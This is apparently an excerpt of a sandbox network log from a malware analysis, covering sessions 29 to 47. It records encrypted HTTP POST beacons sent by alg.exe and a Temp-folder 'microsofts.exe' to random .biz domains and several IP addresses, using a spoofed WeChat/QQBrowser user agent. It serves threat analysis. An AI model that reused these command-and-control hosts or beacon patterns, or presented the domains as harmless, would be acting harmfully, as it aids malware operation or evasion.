Oct 20, 2024 18:41:37.054972887 CEST	350	OUT	POST /spftv HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:37.054972887 CEST	778	OUT	Data Raw: 24 71 6d c2 11 ad f2 c9 fe 02 00 00 8d ac 23 a9 d8 e7 16 ed 34 6f c8 1b c5 4b 68 04 a9 17 41 52 b1 a9 4f 15 00 5f 5c a3 a6 85 62 83 68 20 20 07 e2 13 94 20 04 f0 a6 84 e6 1f 44 4f 84 80 36 13 9a 22 d4 7e 73 fb e4 9c 92 0a d6 7f dc 39 76 f8 ef bb Data Ascii: $qm#4oKhARO_\bh DO6"~s9v{)1/gH?AmTyP[(nL\|o%-X= Q,wD~lu2Kt.$F evV2b.ae YJH;-9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49776	47.129.31.212	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:41.168174982 CEST	353	OUT	POST /rcdhheuvsu HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: xlfhhhm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:41.168174982 CEST	778	OUT	Data Raw: 22 95 48 7d a1 e0 51 e0 fe 02 00 00 b8 a0 0e d3 4b 0a 55 0d 83 94 4f c7 9c 96 2a 22 b6 f4 26 90 c1 0b a9 f9 49 d3 e1 d2 e8 f5 ba f1 27 c0 01 f7 06 f8 56 69 7e d7 09 05 81 53 bc 27 75 ba 47 74 e7 65 bd ce 37 46 71 a9 3c b5 90 4c cf 8b e8 c9 5a 15 Data Ascii: "H}QKUO*"&I'Vi~S'uGte7Fq<LZj+Cl3o1PhR.#spOznQah{zhc6(I\|p)#q#DUkuDLt!>0vUJ:~/K&{G!kc;JTwh=%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49777	47.129.31.212	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:42.889202118 CEST	348	OUT	POST /thnor HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: xlfhhhm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:42.889226913 CEST	778	OUT	Data Raw: 44 3a ea d6 0b ad 77 ba fe 02 00 00 b0 30 b4 40 24 f8 e8 0c 8c 57 e6 7d 88 47 b3 3e a1 32 d7 31 30 c1 f7 3c d0 91 68 ae 00 e3 e8 ca e3 05 d6 d4 54 3f 68 f6 18 3f 9e 5b 75 cb 82 c9 c9 51 15 cf 58 b5 5c 95 2c b0 35 32 ac 26 c8 17 48 fe 36 ef a1 2b Data Ascii: D:w0@$W}G>210<hT?h?[uQX\,52&H6+ideb>#)see'.8IYWy^(6+=xW<IM+1_#=\|]CFV>5}#<k<x/?DRK=<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49778	82.112.184.197	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:44.529478073 CEST	347	OUT	POST /ef HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:41:44.529505968 CEST	826	OUT	Data Raw: 31 b5 a5 4f 11 ff 43 3c 2e 03 00 00 76 01 f0 2d ca 4f b5 b3 d5 a1 ce 09 78 ff 74 49 04 a7 35 ad 0f ea 85 47 96 86 3e fc 09 29 e6 ca 54 a5 34 fd 2f 84 b2 da 84 d2 09 82 43 76 1b e8 22 38 41 cc c3 42 3d c1 4a f8 b1 22 bf 77 14 98 90 2c fc cf 66 2d Data Ascii: 1OC<.v-OxtI5G>)T4/Cv"8AB=J"w,f-wxeR&'G-Q^@Y~jzkuvmi%l?10!MrR77QgYd&1#Uv+kl8$XG_LAu'y2n5Vt3Tm+

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49779	13.251.16.150	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:44.708328009 CEST	353	OUT	POST /wbgwmpvkxxw HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ifsaia.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:44.708328962 CEST	778	OUT	Data Raw: f5 9c b3 b9 79 ae e2 40 fe 02 00 00 e8 96 b8 71 ef 35 7c e8 aa 3b 98 6f 8e 74 47 f5 32 22 95 54 20 36 87 8b 5d 40 2f b8 32 02 ef 0d 5d 2f 98 a5 a1 87 26 f3 c6 69 31 60 f7 7a 64 dd 2d 72 9a 50 0f ac b7 de 78 76 38 7b a6 08 02 98 1b 63 dc fe c6 e1 Data Ascii: y@q5\|;otG2"T 6]@/2]/&i1`zd-rPxv8{cDZOGvUkmL8xW#@pfJLO4n\|9Y]@EcuFvK\p'Unq<w=7Oub\|l{)0~0*eU)%:=[Y`K

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49780	13.251.16.150	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:46.557861090 CEST	358	OUT	POST /pfoxkxwneqnmhcsc HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ifsaia.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:46.557861090 CEST	778	OUT	Data Raw: af 80 12 bd 4e d3 c9 c5 fe 02 00 00 59 22 57 bd 30 a8 df f7 a0 84 f2 9c ee 45 ba a7 80 45 1a 06 b9 f6 4c 03 fc 30 71 9e ae 78 88 64 ff 8b 52 1a d4 a9 79 5d b3 70 9f e5 a1 2f 37 ed 11 ae f4 9a 80 a7 77 66 f9 75 86 bd d9 34 89 2f c8 c4 45 45 36 74 Data Ascii: NY"W0EEL0qxdRy]p/7wfu4/EE6tCWr{LB >8PL4y=dqMeSYL^@8^U,TE`c7\|^HsW#V,[nJa( Mw =d+O$CuxrCs2>km

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49781	44.221.84.105	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:48.269639015 CEST	352	OUT	POST /sattbfx HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: saytjshyf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:48.269670010 CEST	778	OUT	Data Raw: b3 00 0b 0b d6 83 02 e2 fe 02 00 00 60 f5 e2 b3 12 b1 e9 01 7e 71 5e 65 17 d1 42 86 bb f1 a2 6f 2e 69 07 22 8d 21 7c fa b8 94 88 77 af 0a 7f 6d d1 65 a4 5e f5 d8 e0 f4 6e 72 f0 54 00 32 6f 15 69 03 42 59 a9 70 c9 06 0e 09 a5 7a 41 62 b5 23 52 40 Data Ascii: `~q^eBo.i"!\|wme^nrT2oiBYpzAb#R@+8D\ _<J3UWLsXf=I:'>b/hzy{3@sytD)9Tz~"2l1lZ,}l-;:^V@[

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49782	44.221.84.105	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:49.332478046 CEST	354	OUT	POST /qjmcjynbe HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: saytjshyf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:49.332515955 CEST	778	OUT	Data Raw: 58 d0 4e 51 42 30 17 7a fe 02 00 00 e2 03 f0 c2 7c 4b ba d0 44 4a f9 bc 7d 7c 9e 97 4d 6d 49 94 fe 9a 90 61 e1 98 9a 86 20 75 2c 73 b1 c7 d7 8a 09 28 7d 4b d6 5b 08 75 a8 39 9e ca 87 49 a7 8e 6a 97 14 52 41 d1 0f d0 3e af 75 3c bf 62 2b e5 b8 1d Data Ascii: XNQB0z\|KDJ}\|MmIa u,s(}K[u9IjRA>u<b+7hLg^p_N"+\AD}ec\[3&!2x8Mmv@;_Xr4nA"no3,bfxy=z)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49783	18.141.10.107	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:50.496871948 CEST	356	OUT	POST /hudnfeopxibfg HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vcddkls.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:50.496871948 CEST	778	OUT	Data Raw: c6 76 cc cc 32 7c 1b fa fe 02 00 00 05 7d b0 89 43 e3 2e bf 02 8e 08 bf 5e a8 45 e5 74 4e e5 f8 15 9b 60 e5 03 4a 3a f9 ae 9b 4a 1a 2e e3 ed 5d d5 49 67 46 6a 07 60 17 48 58 82 12 86 f2 56 23 61 8e e3 08 25 ef 0b c2 55 65 b2 73 40 27 0a 3c 96 fb Data Ascii: v2\|}C.^EtN`J:J.]IgFj`HXV#a%Ues@'<@A#;3SqAhX27VlMW;BMgXSP);m.9ucNp;-}xVV<=(~D#1&_ImPcLdstkVig%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49784	82.112.184.197	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:52.226824045 CEST	349	OUT	POST /dqsc HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:41:52.226839066 CEST	826	OUT	Data Raw: 93 2d ae ed dd 30 40 a5 2e 03 00 00 75 cc db 92 a6 90 9a d7 e3 82 55 7b 60 47 6c ed 66 24 d1 fb cf 3a 20 68 c3 97 c7 c0 d5 85 6c 1d 63 03 ca 83 21 2f b6 a5 ba ce be c3 9a 77 b5 26 3b 5c ef 3e 3a 65 1b 03 e8 10 ec 8b 01 8a a0 67 15 2c 80 86 22 7d Data Ascii: -0@.uU{`Glf$: hlc!/w&;\>:eg,"}J(u7V}jfTDWsQBSb`a=0!$b-%E"}[6*0X8`TPI8JEosb:CbY=hCLsiL@?['<q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49785	18.141.10.107	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:52.382006884 CEST	357	OUT	POST /qjnulfbcbrtstm HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vcddkls.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:52.382006884 CEST	778	OUT	Data Raw: fd 8b 43 a4 d5 71 81 54 fe 02 00 00 74 08 94 38 31 82 d2 d2 d3 a7 da 6d f0 48 9f f0 b0 ca d5 2d 7d 8e 55 e0 d2 f8 cf 5b 90 f9 2d de fc 22 52 91 88 a2 c4 9b 25 a2 5e 89 75 97 49 3c 2e 58 1b 38 6f 52 17 e6 1a ef 1e 24 c7 91 ee 38 c7 58 b2 4e be 29 Data Ascii: CqTt81mH-}U[-"R%^uI<.X8oR$8XN)?<G`_dAhKF[ S:&C*1GTVZ&j+#WcL<DR^K{-`_:2r0lOYi)(cEKEMmQK2BiCyxWoRm

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49786	172.234.222.138	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:53.119260073 CEST	343	OUT	POST /yr HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: fwiwk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:53.119286060 CEST	778	OUT	Data Raw: d6 6f 48 81 75 ec fc 1d fe 02 00 00 f0 df 38 28 2d a6 e1 25 53 2c 53 4f d7 1a 20 5f b0 95 99 1c 5c 3f ac 9e ab 77 33 90 e5 46 ec 06 de da 13 21 14 97 16 3b 10 87 f4 a6 7a 17 85 09 fa ad de 7c b9 bb 0e 4b d0 41 35 33 5c f5 ac 9f b8 34 5c 5b b6 3e Data Ascii: oHu8(-%S,SO _\?w3F!;z\|KA53\4\[>U"LSN2m_~Iz,]XuP2S:ZL&+@ES+#[["Ose%}zJS"KV)U6#xw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49787	172.234.222.138	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:55.104660988 CEST	342	OUT	POST /i HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: fwiwk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:55.104660988 CEST	778	OUT	Data Raw: 70 fc fa 0f d9 cf 9c 16 fe 02 00 00 31 2e 87 36 34 7d 12 00 52 d7 a6 07 c6 3f 98 06 5a 94 dc b8 e7 c2 8b 31 14 6c e0 79 8a 60 b7 42 de e3 e8 cb 98 37 08 50 60 54 5f c5 82 dc 72 6c f5 e7 b2 8e 1d 75 f2 2f ad ac 8e af d4 db 97 8b b4 05 2c 9b 2d a6 Data Ascii: p1.64}R?Z1ly`B7P`T_rlu/,-%0 &@a#Sv,S0faL_*&lu9lY7\|<a@aE4E~_=DafRR$7:/j$i)Lw=7A2oBTfe.qV$W~f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49788	34.246.200.160	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:56.351519108 CEST	347	OUT	POST /gobhb HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: tbjrpv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:56.351542950 CEST	778	OUT	Data Raw: c5 78 98 7d 32 55 da 6a fe 02 00 00 ab bb 9b ce 43 81 f1 93 0b 20 4e 70 6d 9c c5 a3 38 92 1f 48 65 bc 7c ea d6 73 4b 6a 93 1c 3e 5c f6 5f 03 69 0a 61 55 46 7b 51 2d 95 c6 e9 96 47 96 89 c7 af 5e 16 17 df 8e 2a 93 0a 98 53 90 f3 50 2d b9 8f 49 93 Data Ascii: x}2UjC Npm8He\|sKj>\_iaUF{Q-G^*SP-IP<(+Yu2v^'LlC#d2{BGg!5A4FZ?9I"J&IGWO\0xJvy$n6=1~A4/sh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49789	34.246.200.160	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:57.727570057 CEST	346	OUT	POST /dobp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: tbjrpv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:57.727596998 CEST	778	OUT	Data Raw: 83 f2 3e c3 67 96 a6 cb fe 02 00 00 e1 00 e8 25 9d 3a cb 4a 33 35 25 a2 14 49 77 5c e5 88 59 a6 06 7c 8c 64 fa ff 65 ab 38 26 19 31 fa ab f8 dc 5e fe 0f 01 0c a8 7a 94 05 1e 12 0e 76 0c 41 dd c9 5d f2 eb 49 46 50 7a 31 47 aa 5f a5 30 70 b5 6c 10 Data Ascii: >g%:J35%Iw\Y\|de8&1^zvA]IFPz1G_0pl(DxwW,_#h_fjgKW[J8ts3E1[iV=\|LH:mKw=C?^"'\|jsM4i35I}6KAeP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49791	47.129.31.212	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:59.956516981 CEST	347	OUT	POST /uxri HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: xlfhhhm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:41:59.956516981 CEST	826	OUT	Data Raw: 23 5a 7a bc 43 37 70 78 2e 03 00 00 73 ac 6c 21 2a 2b ac 8b 81 fa 0d a7 51 27 77 d3 f6 0f 2a 4e eb d9 1a c0 e1 10 ae b6 6e 7a f9 21 5f f2 ea 2e d1 13 e3 43 6b ae 49 20 2e 5d e5 35 17 98 32 08 86 e7 fc 8b 97 17 2b 9d 92 27 12 9d 9b 91 09 5c bf e7 Data Ascii: #ZzC7px.sl!+Q'wNnz!_.CkI .]52+'\f`<6x],?xMCH`lNIE~X9l=o"(A\)10;<<jWC6d:};wqp)6w=6OlyQboK2UAOa?[k0pg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49792	18.208.156.248	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:41:59.966897011 CEST	357	OUT	POST /prvlplgfktyghiuq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: deoci.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:41:59.966921091 CEST	778	OUT	Data Raw: 96 68 ff 84 c3 90 bf e2 fe 02 00 00 ab 3b 6c ac 03 dd cd cc ae f1 1f 46 25 2f 8c 89 e3 0d 03 9c 42 90 3b 59 5f 31 df 2a c3 5f 9d 94 24 91 2c 80 c7 ea 11 05 0e d0 2c 61 bc c4 b9 10 a6 80 ab b4 af c5 d7 01 0c 09 fb b1 ea 44 b1 b9 e5 8f 26 24 aa 85 Data Ascii: h;lF%/B;Y_1_$,,aD&$+9?rhJe6!1,^(0h`mKiCd\!\q@4\{y'M8elt}T>el}HT0Oi(5$[{_-VRZX: cI?C\|g

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49793	18.208.156.248	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:00.988149881 CEST	354	OUT	POST /gpnrhxymwwoww HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: deoci.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:00.988316059 CEST	778	OUT	Data Raw: 8c 25 6e cb bb c5 49 43 fe 02 00 00 26 1f 01 4d 08 09 ab c0 57 c6 b5 7e 03 79 43 9c 9c 4f fe df b1 e7 6f 09 78 1c 87 c3 a1 83 d8 a8 b9 4d 46 38 8f 74 f6 e0 a3 79 e8 4d 0b c2 06 66 82 43 6e 86 96 e4 f5 1e 92 2e b7 60 f9 71 76 fa 42 c5 6d 5d b4 70 Data Ascii: %nIC&MW~yCOoxMF8tyMfCn.`qvBm]p<cU;0N]PN>?bc.%"y2HcoS}m^&i=.k>@^E_&m5_{('r)Y]TWx&5\SSTeL

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49799	47.129.31.212	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:01.703905106 CEST	357	OUT	POST /sbrspaxifluxyh HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: xlfhhhm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:01.703905106 CEST	826	OUT	Data Raw: 1d 61 1c 0d c0 3f 69 aa 2e 03 00 00 fa 30 60 9b d4 00 72 62 fe 72 bf a6 d4 e6 94 d7 5d fe 3b c8 86 99 3b fa 08 e1 c9 eb ab 30 a4 1e 90 18 1f f3 a9 a6 81 14 10 98 66 ef 56 4f 01 18 8d 98 66 11 b9 88 8e 96 58 a7 c4 ea b3 0a d4 d9 f7 69 95 4e 2b 91 Data Ascii: a?i.0`rbr];;0fVOfXiN+%EZ'vZ}:'b]l/f]4:Pc4Js'eRi<sESD%zn ?Ts?\R6tPFYc~F1}4n`P:v_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49800	208.100.26.245	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:02.020149946 CEST	345	OUT	POST /v HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gytujflc.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:02.020159960 CEST	778	OUT	Data Raw: fe 13 f4 e6 81 ca 53 79 fe 02 00 00 3f 6d 76 cf 5b 2d 7a 80 e4 6c ab c6 e8 3c f3 39 45 55 c5 9d 85 47 29 88 51 7e 93 9f cf 0c e5 e3 93 1d 90 da a5 ea 6d b9 77 bb 54 2e 51 f8 8c 5b e5 3c 3a fe a2 ee cf 6c 84 50 60 03 94 7b 4e 1a e9 b9 57 c6 8f a1 Data Ascii: Sy?mv[-zl<9EUG)Q~mwT.Q[<:lP`{NW=BT+2UZh$D@YED\|lLEc!_Nbh7>W_2d}H(n)k7:un}qlv0pE0N>dq
Oct 20, 2024 18:42:02.880412102 CEST	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Sun, 20 Oct 2024 16:42:02 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 20, 2024 18:42:03.012974977 CEST	353	OUT	POST /pyjgudwdt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gytujflc.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:03.013025045 CEST	778	OUT	Data Raw: 08 74 74 18 f4 f8 4f 98 fe 02 00 00 81 5a 1d 88 8c c5 02 3a 46 ce 3f ea 80 e9 81 22 b0 16 e9 fa 13 b0 af c4 fb 9f a6 fa 98 86 ac f3 6e fd 83 2f bf ff cd e9 af fc 6d 39 78 c7 6c 6a c1 f3 65 b5 b1 b0 d4 90 75 d6 12 d0 f0 14 02 48 fa 87 d3 cf 4d 72 Data Ascii: ttOZ:F?"n/m9xljeuHMrNZa-`s>=~V'rlm!o:7^/Yc-L^JNzB./2WKiv$DH&0a[P06K_g0#fN
